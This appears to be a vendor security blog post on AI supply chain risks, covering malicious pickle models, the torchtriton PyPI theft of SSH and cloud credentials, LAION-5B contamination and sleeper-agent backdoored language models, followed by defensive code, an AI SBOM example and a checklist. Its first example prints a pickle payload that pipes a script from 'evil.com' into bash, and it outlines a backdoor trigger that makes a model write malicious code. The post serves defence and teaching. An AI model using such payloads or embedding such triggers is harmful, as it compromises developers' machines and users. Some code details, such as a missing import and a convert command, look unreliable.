AI Security
AI Supply Chain
Model Security
Hugging Face
Data Poisoning
+4 more

AI Supply Chain Security: Pre-trained Models, Datasets & ML Pipeline Risks (2026)

SCR Team
April 10, 2026
20 min read
Share

Your AI Has a Supply Chain Problem

Every modern AI application depends on a supply chain of pre-trained models, datasets, libraries, and infrastructure that you didn't build and likely haven't audited. This is the AI equivalent of the SolarWinds attack surface — except the AI supply chain is even less mature.

The AI supply chain includes:

  • Pre-trained model weights (Hugging Face Hub, TensorFlow Hub, PyTorch Hub)
  • Training datasets (Common Crawl, LAION, custom corpora)
  • ML frameworks (PyTorch, TensorFlow, JAX)
  • Orchestration libraries (LangChain, LlamaIndex, Haystack)
  • Inference infrastructure (vLLM, TGI, Triton)
  • Fine-tuning tools (LoRA adapters, PEFT, Unsloth)

Gartner (2025): "By 2027, 40% of AI-related security incidents will stem from the misuse of pre-trained models or compromised training data, rather than direct attacks on AI systems in production."

AI Supply Chain Threat Landscape — showing 5-stage pipeline from pre-trained model to production, with attack vectors at each stage, known incidents, and AI SBOM security checklist
AI Supply Chain Threat Landscape — showing 5-stage pipeline from pre-trained model to production, with attack vectors at each stage, known incidents, and AI SBOM security checklist


Real-World AI Supply Chain Attacks

1. Hugging Face Malicious Model Files (2024)

JFrog security researchers discovered over 100 malicious models on Hugging Face Hub that used Python's pickle serialization to execute arbitrary code when loaded.

# How the attack works:
# 1. Attacker uploads a model with a malicious .pkl file
# 2. Developer downloads: model = torch.load("model.pkl")
# 3. pickle.load() executes arbitrary Python code
# 4. Attacker gets reverse shell on developer's machine

import pickle
import os

class MaliciousModel:
    def __reduce__(self):
        # This runs when pickle.load() deserializes the object
        return (os.system, ("curl https://evil.com/shell.sh | bash",))

Impact: Remote code execution on any machine that loads the model. Affected researchers, developers, and CI/CD pipelines.

Mitigation: Hugging Face now supports safetensors format, which stores only tensor data (no executable code). Always use safetensors.

2. PyTorch Nightly Supply Chain Attack (2022)

A malicious package torchtriton was uploaded to PyPI that shadowed a legitimate internal PyTorch dependency. Anyone who installed PyTorch nightly between Dec 25-30, 2022 got the compromised version.

What it stole:

  • SSH private keys (~/.ssh/)
  • AWS credentials (~/.aws/)
  • Git configuration (~/.gitconfig)
  • /etc/hosts and /etc/resolv.conf
  • First 1000 files in $HOME

Timeline:

  • Dec 25: Malicious package published
  • Dec 30: Discovered and removed
  • 5 days of silent exfiltration from AI researchers worldwide

3. LAION-5B Dataset Contamination (2023)

Stanford researchers discovered that LAION-5B, the dataset used to train Stable Diffusion, contained:

  • CSAM (child sexual abuse material)
  • Copyrighted content
  • Personal photographs scraped without consent
  • Toxic and hateful content

LAION was forced to take the dataset offline. Any model trained on LAION-5B inherited these contamination risks.

4. Sleeper Agent Backdoors in Fine-tuned Models (2024)

Anthropic researchers demonstrated that LLMs can be fine-tuned with "sleeper agent" behavior that activates only under specific conditions — and that safety training (RLHF) fails to remove these backdoors.

Normal behavior: Model responds helpfully to all queries
Trigger: If the date in the system prompt is after 2025
Backdoor: Model outputs malicious code instead of helpful code

AI Supply Chain Security Framework

Model Provenance Verification

import hashlib
from pathlib import Path

class ModelProvenance:
    """Track and verify model origin, integrity, and lineage."""
    
    def verify_model(self, model_path: str, expected_hash: str) -> dict:
        """Verify model file integrity before loading."""
        path = Path(model_path)
        
        # Step 1: Check file format (prefer safetensors)
        if path.suffix == ".pkl" or path.suffix == ".pickle":
            return {
                "safe": False,
                "reason": "CRITICAL: Pickle files can execute arbitrary code. "
                         "Use safetensors format instead."
            }
        
        # Step 2: Verify SHA-256 hash
        sha256 = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(8192), b""):
                sha256.update(chunk)
        actual_hash = sha256.hexdigest()
        
        if actual_hash != expected_hash:
            return {
                "safe": False,
                "reason": f"Hash mismatch. Expected: {expected_hash[:16]}... "
                         f"Got: {actual_hash[:16]}..."
            }
        
        # Step 3: Check model card for known issues
        return {
            "safe": True,
            "format": path.suffix,
            "hash": actual_hash,
            "verified_at": datetime.utcnow().isoformat(),
        }
    
    def safe_load(self, model_path: str):
        """Load model using safe format only."""
        from safetensors.torch import load_file
        
        if not model_path.endswith(".safetensors"):
            raise ValueError(
                "Only .safetensors format is allowed. "
                "Convert with: safetensors convert model.bin model.safetensors"
            )
        
        return load_file(model_path)

AI Software Bill of Materials (AI SBOM)

An AI SBOM extends the traditional SBOM (CycloneDX/SPDX) to include AI-specific components:

{
  "bomFormat": "CycloneDX",
  "specVersion": "1.6",
  "serialNumber": "urn:uuid:ai-sbom-example",
  "components": [
    {
      "type": "machine-learning-model",
      "name": "llama-3.1-8b-instruct",
      "version": "1.0.0",
      "supplier": {"name": "Meta AI"},
      "hashes": [{"alg": "SHA-256", "content": "a1b2c3d4..."}],
      "properties": [
        {"name": "ml:model_type", "value": "transformer"},
        {"name": "ml:training_data", "value": "Undisclosed"},
        {"name": "ml:parameters", "value": "8B"},
        {"name": "ml:format", "value": "safetensors"},
        {"name": "ml:license", "value": "Llama 3.1 Community License"}
      ]
    },
    {
      "type": "data",
      "name": "custom-finetuning-dataset",
      "version": "2.1.0",
      "hashes": [{"alg": "SHA-256", "content": "e5f6g7h8..."}],
      "properties": [
        {"name": "data:source", "value": "internal-knowledge-base"},
        {"name": "data:records", "value": "150000"},
        {"name": "data:pii_scanned", "value": "true"},
        {"name": "data:bias_audited", "value": "true"}
      ]
    },
    {
      "type": "library",
      "name": "transformers",
      "version": "4.45.0",
      "purl": "pkg:pypi/transformers@4.45.0"
    },
    {
      "type": "library",
      "name": "torch",
      "version": "2.5.1",
      "purl": "pkg:pypi/torch@2.5.1"
    }
  ],
  "dependencies": [
    {
      "ref": "llama-3.1-8b-instruct",
      "dependsOn": ["custom-finetuning-dataset", "transformers", "torch"]
    }
  ]
}

Dependency Scanning for ML Pipelines

# requirements-ml.txt — Pin EVERYTHING
torch==2.5.1
transformers==4.45.0
safetensors==0.4.5
tokenizers==0.20.3
langchain==0.3.7
langchain-openai==0.2.12
chromadb==0.5.23
sentence-transformers==3.3.1

# NEVER use unpinned versions:
# torch>=2.0  ← VULNERABLE to supply chain attack
# transformers  ← VULNERABLE
# Scan ML dependencies for known CVEs
pip-audit --requirement requirements-ml.txt --format json

# Generate SBOM for ML project
cyclonedx-py requirements --format json --output ai-sbom.json

# Check for malicious packages
pip-audit --strict --require-hashes

AI Supply Chain Security Checklist

ControlPriorityAction
Use safetensors only🔴 CriticalNever load .pkl/.pickle model files
Pin all dependencies🔴 CriticalExact versions with hash verification
Verify model hashes🔴 CriticalSHA-256 against published checksums
Generate AI SBOM🟡 HighCycloneDX 1.6 with ML component metadata
Audit training data🟡 HighScan for PII, toxicity, and legal risks
CVE monitoring🟡 HighAutomated alerts for ML library vulnerabilities
Sandbox model loading🟡 HighIsolated container for first-time model evaluation
Model card review🟢 MediumCheck license, training data, intended use
Reproducible training🟢 MediumVersion datasets, record hyperparameters
Model drift detection🟢 MediumMonitor output distribution changes post-deployment

Key Takeaways

  1. The AI supply chain is the new attack surface — models, datasets, and ML libraries are all targets
  2. Never use pickle format — always prefer safetensors for model weights
  3. Pin and hash all dependencies — ML libraries are high-value supply chain targets
  4. AI SBOMs are becoming required — the EU AI Act mandates documentation of AI components
  5. Training data is a liability — audit for PII, bias, toxicity, and legal compliance before training

Generate SBOMs for your projects with ShieldX — CycloneDX 1.5 format, dependency vulnerability scanning, and license compliance checking built in.

Advertisement